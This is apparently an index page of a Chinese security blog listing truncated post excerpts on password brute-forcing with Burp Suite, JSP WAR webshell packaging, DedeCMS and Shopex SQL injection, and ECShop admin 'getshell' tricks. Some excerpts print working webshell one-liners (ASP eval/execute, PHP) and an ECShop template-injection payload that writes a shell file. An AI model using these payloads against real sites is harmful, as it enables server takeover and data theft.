为了适应wordpress最新的版本,本站模板已更新

 分类:安全

使用Burp Suite爆破Web应用密码

使用Burp Suite爆破Web应用密码
0X01 背景 Burp Suite是一款非常优秀的针对Web应用的攻击平台,网上的教程也比较多,甚至在淘宝还有收费教程。由于Burp Suite功能强大,可实现多种web攻击,我总感觉网上现有的教程过于复杂,对于新手不那么容易理解。所以我决定自己写一点东西,结合原理,简单介绍B...

4年前 (2015-01-15) 991℃ 0喜欢

30种症状证明你应该离开电脑到户外走走

30种症状证明你应该离开电脑到户外走走
既然你选择了编程作为职业,就注定了要终生以计算机为伴。但这并不意味着你应该置自己的健康不顾。谁都知道,电脑面前待久了,一是伤害你的眼睛,而是久坐伤身,还有会导致性格孤僻——因为你整天面对的是计算机,而不是活生生的人。到户外去,离开电脑,离开办公室。如果你还不确定是否应该这样做,...

5年前 (2014-11-12) 1372℃ 0喜欢

JSP脚本shell war格式 Webshell制作

JSP脚本shell war格式 Webshell制作
war格式Webshell(脚本木马)制作 在jdk bin下建立 k8team 把jsp的webshell文件放进去 cd C:\jdk\bin\k8team C:\jdk\bin\k8team>  C:\jdk\bin\jar.exe cf k8team.war * 转...

5年前 (2014-08-13) 2193℃ 0喜欢

织梦dedecms 5.7 plus/car.php sql注入0day

织梦dedecms 5.7 plus/car.php sql注入0day
测试方法: @Sebug.net   dis 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! <?php $host=$argv[1]; $path=$argv[2]; $path=$path.”plus/car.php”;...

5年前 (2014-08-13) 1862℃ 0喜欢

ECShop V2.7.3最新后台拿shell

ECShop V2.7.3最新后台拿shell
ECShop V2.7.3最新后台拿shell方法,语言库代码执行。… 选择模版管理 – 语言项编辑 搜索“用户信息” 在用户信息后面加上: ${${fputs(fopen(base64_decode(cGNzbGkucGhw),w),base64_de...

5年前 (2014-08-13) 5419℃ 1喜欢

ecshop 2.7.3 后台过滤不严可获取shell

ecshop 2.7.3 后台过滤不严可获取shell
漏洞作者: Fixw 提交时间: 2013-11-25 13:47 公开时间: 2014-02-23 13:48 漏洞类型: 文件上传导致任意代码执行 简要描述: ecshop后台过滤不严可以上传php文件。。。。 详细说明: 问题出现在后台引用外部url图片时没有过滤文件格式,...

5年前 (2014-08-13) 1454℃ 0喜欢

[转]不用破解管理员Hash,K8飞刀使用Cookie直接进入Ecshop后台

[转]不用破解管理员Hash,K8飞刀使用Cookie直接进入Ecshop后台
方法是网上公开的,在这里我只是做个演示教程,没什么 呵呵真正的目的 只是给大家演示 K8飞刀的cookie功能,XSS来的Cookie可以直接飞刀登陆的 这些功能打算也一起写在WEBSHELL管理那里的,但是都得等我有空先。 当然cookie设置 你想用别的工具也行啊,不拦你啊,...

5年前 (2014-08-13) 3669℃ 2喜欢

备份专用一句话

备份专用一句话
备份专用 <%eval(request(“a”)):response.end%> %><%eval(request(chr(35)))%><%’ asp一句话 <%execute(request(“1″))%> php...

5年前 (2014-07-13) 1382℃ 0喜欢

Ecshop后台getshell-2(非模板,非sql)

Ecshop后台getshell-2(非模板,非sql)
后台可以编辑语言项,并且语言项中有部分是双引号,所以可以通过 {${phpinfo()}}这种格式直接执行php代码,getshell!!(这里为了方便演示,使用phpinfo,实际情况可以换成一句话)   语言文件有双引号   后台可以编辑语言文件,插入...

6年前 (2013-10-30) 1700℃ 0喜欢

Shopex后台登录页面注入漏洞附利用POC

Shopex后台登录页面注入漏洞附利用POC
对登录时传递的某参数未做过滤,导致注入的产生 最近做二次开发的时候看到了登录的流程 发现在文件\shopex\core\admin\controller\ctl.passport.php 处理了验证码,管理帐号和密码,但是在最底下发现一个sess_id function cert...

6年前 (2013-10-30) 1808℃ 1喜欢

转 国产WEB漏洞测试平台——MST

转 国产WEB漏洞测试平台——MST
Mst是一款Python2.7编写的小漏洞利用平台,可运行在windows | Backtrack | maxosx 等系统,专注于web漏洞的测试和各种利用插件的编写。 不懂怎么介绍,来看下截图吧~ 在windows上运行: Backtrack:(需要注意=>执行请输入...

6年前 (2013-10-30) 1675℃ 0喜欢